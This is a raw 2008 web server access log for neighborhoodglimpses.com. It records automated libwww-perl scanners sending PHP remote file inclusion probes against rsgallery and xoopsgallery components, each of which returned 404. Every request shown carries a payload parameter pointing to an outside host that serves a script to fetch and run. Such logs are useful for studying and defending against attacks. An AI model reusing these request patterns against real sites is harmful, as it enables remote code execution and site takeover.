80.32.194.164 - - [01/Jun/2008:19:17:43 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
80.32.194.164 - - [01/Jun/2008:19:17:43 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
72.9.228.149 - - [01/Jun/2008:19:18:00 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
72.9.228.149 - - [01/Jun/2008:19:18:00 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
72.9.228.149 - - [01/Jun/2008:19:18:00 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
70.84.106.68 - - [01/Jun/2008:19:18:17 -0700] "GET /logs/access_071224.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
70.84.106.68 - - [01/Jun/2008:19:18:18 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
70.84.106.68 - - [01/Jun/2008:19:18:18 -0700] "GET /logs/access_071224.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
70.84.106.68 - - [01/Jun/2008:19:18:18 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
70.84.106.68 - - [01/Jun/2008:19:18:18 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
70.84.106.68 - - [01/Jun/2008:19:18:18 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
85.214.26.80 - - [01/Jun/2008:19:19:28 -0700] "GET /logs/access_080211.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
85.214.26.80 - - [01/Jun/2008:19:19:28 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
85.214.26.80 - - [01/Jun/2008:19:19:29 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
72.9.228.149 - - [01/Jun/2008:19:19:30 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
70.84.106.68 - - [01/Jun/2008:19:20:12 -0700] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
70.84.106.68 - - [01/Jun/2008:19:20:13 -0700] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
72.9.228.149 - - [01/Jun/2008:19:20:27 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
87.106.98.71 - - [01/Jun/2008:19:20:46 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.106.98.71 - - [01/Jun/2008:19:20:46 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
166.90.8.230 - - [01/Jun/2008:19:21:02 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
166.90.8.230 - - [01/Jun/2008:19:21:02 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
85.214.26.80 - - [01/Jun/2008:19:21:26 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
85.214.26.80 - - [01/Jun/2008:19:21:27 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.gaming-31337.de/Lesslie/IMG_0002.JPG?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
213.198.106.61 - - [01/Jun/2008:19:21:27 -0700]